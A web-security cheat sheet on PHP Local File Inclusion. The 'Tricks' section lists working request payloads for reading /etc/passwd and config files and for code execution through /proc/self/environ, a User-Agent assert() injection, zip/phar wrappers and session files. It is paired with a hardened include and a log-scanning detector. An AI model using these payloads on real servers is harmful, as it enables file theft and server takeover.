Tricky ways to exploit PHP Local File Inclusion

Introduction

Quoting Wikipedia, Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability, except that instead of including remote files, only local files, i.e. files already on the server, can be included for execution.

For instance:

include $_GET['file'];

or, a harder one to exploit because the extension is fixed by the application:

include $_GET['file'] . ".php";
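For comparison, here are the two vulnerable includes from above next to a hardened version. This is an added example, not code from the original page: the page directory, the allowlist of page names and the `page` parameter are assumptions. The point is that the request only chooses a name from a fixed list, and the server builds and re-checks the path, so none of the wrapper or path tricks described in the next section reach `include`.

```php
<?php
// Added example (not from the original page): the two vulnerable includes
// from the introduction, followed by a hardened equivalent.

// Vulnerable: whatever path or stream wrapper the client supplies is included
// (php://filter/..., zip://..., phar://..., /proc/self/environ, session files).
function vulnerable_include(string $file): void
{
    include $file;
}

// Still vulnerable: a fixed suffix does not stop wrappers that resolve the
// name inside an archive, nor a file whose real name already ends in "php".
function vulnerable_include_suffixed(string $file): void
{
    include $file . ".php";
}

// Hardened: the request selects a page *name*; the server owns the path.
const PAGE_DIR      = __DIR__ . '/pages';                 // assumed location of includable pages
const ALLOWED_PAGES = ['home', 'about', 'contact'];       // assumed allowlist of page names

function safe_include(string $page): bool
{
    // 1. Exact-match allowlist: no "/", "..", ":" or "://" can get through,
    //    so stream wrappers and absolute paths are rejected before any I/O.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return false;
    }

    // 2. Defence in depth: resolve the final path and confirm it is still
    //    inside PAGE_DIR. realpath() returns false for missing files and does
    //    not resolve php://, zip:// or phar:// URLs.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $page . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }

    include $path;
    return true;
}

if (!safe_include($_GET['page'] ?? 'home')) {
    http_response_code(404);
    echo 'Unknown page';
}
```

Note that `allow_url_include=Off` (the default) only blocks remote wrappers such as `http://`; `php://filter`, `zip://` and `phar://` are treated as local and still work with `include`, which is why the allowlist, not the ini setting, is the control that matters here. `open_basedir` adds a filesystem boundary but does not replace it.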

Tricks

Direct Local File Inclusion

  • Reading arbitrary files:

    • index.php?file=/etc/passwd
    • index.php?file=php://filter/convert.base64-encode/resource=config.php
  • Remote code execution:

    • /proc/self/environ

      GET /index.php?file=/proc/self/environ&cmd=id HTTP/1.1
      Host: www.site.com
      User-Agent: <?php echo assert($_GET['cmd']);?>
      
    • Zip and Phar wrappers

      • index.php?file=zip://image.zip#shell.php
      • index.php?file=phar://image.phar/shell.php
    • Session Files

      • PHP5 stores session files in /var/lib/php5/sess_*
        Cookie: PHPSESSID=123php # /var/lib/php5/sess_123php
        index.php?file=/var/lib/php5/sess_123php
        

Indirect Local File Inclusion

  • Reading arbitrary files:

    • index.php?file=php://filter/convert.base64-encode/resource=config # will append ".php" at the end
  • Remote code execution:

    • Zip and Phar wrappers
      • index.php?file=zip://image.zip#shell
      • index.php?file=phar://image.phar/shell
    • Session Files
      • PHP5 stores session files in /var/lib/php5/sess_*
        Cookie: PHPSESSID=123php # /var/lib/php5/sess_123php
        index.php?file=/var/lib/php5/sess_123
        
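The indicators used in both the Direct and the Indirect sections (the `php://filter`, `zip://` and `phar://` wrappers, `/proc/self/environ`, `/etc/passwd`, PHP session file paths, and PHP tags planted in the `User-Agent` header) are all visible in an ordinary combined-format access log. The scanner below flags them; it is an added example, not part of the original page, and the log lines in it are constructed for the example, as is the log format assumption (Apache/nginx combined format with the User-Agent as the last quoted field).

```php
<?php
// Added example (not from the original page): flag the LFI indicators from
// the Direct and Indirect sections in combined-format access log lines.
// The log lines at the bottom are constructed for this example.

const LFI_INDICATORS = [
    'php_filter_wrapper' => '~php://filter~i',
    'zip_wrapper'        => '~zip://~i',
    'phar_wrapper'       => '~phar://~i',
    'proc_self_environ'  => '~/proc/self/environ~i',
    'etc_passwd'         => '~/etc/passwd~',
    'php_session_file'   => '~/var/lib/php5?/sess_~',
    'php_tag_in_header'  => '~<\?php~i',          // PHP code smuggled via User-Agent
];

// ip ident user [time] "METHOD path protocol" status bytes "referer" "user-agent"
const LOG_PATTERN = '~^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$~';

function parse_log_line(string $line): ?array
{
    if (!preg_match(LOG_PATTERN, $line, $m)) {
        return null;                                // not a combined-format line
    }
    return ['ip' => $m[1], 'method' => $m[2], 'path' => $m[3],
            'status' => (int) $m[4], 'ua' => $m[5]];
}

function lfi_indicators(array $entry): array
{
    // Decode the request once: PHP sees $_GET values decoded, so matching on
    // the decoded text catches percent-encoded variants of the same payload.
    $haystack = urldecode($entry['path']) . "\n" . $entry['ua'];
    $hits = [];
    foreach (LFI_INDICATORS as $name => $regex) {
        if (preg_match($regex, $haystack)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

function scan_log(array $lines): array
{
    $alerts = [];
    foreach ($lines as $line) {
        $entry = parse_log_line($line);
        if ($entry === null) {
            continue;
        }
        $hits = lfi_indicators($entry);
        if ($hits !== []) {
            $alerts[] = ['ip' => $entry['ip'], 'status' => $entry['status'],
                         'path' => $entry['path'], 'indicators' => $hits];
        }
    }
    return $alerts;
}

// Constructed sample: two requests matching the page's tricks, one benign.
$sampleLog = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?file=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?file=/proc/self/environ&cmd=id HTTP/1.1" 200 2048 "-" "<?php /* payload omitted */ ?>"',
    '10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?file=about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
];

foreach (scan_log($sampleLog) as $alert) {
    printf("%s %s -> %s\n", $alert['ip'], $alert['path'], implode(',', $alert['indicators']));
}
```

A 200 status on a flagged request is the line worth prioritising: a 404 or 500 often means the include failed, while a successful response to `php://filter/...` or `/proc/self/environ` suggests the file was actually read or executed.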
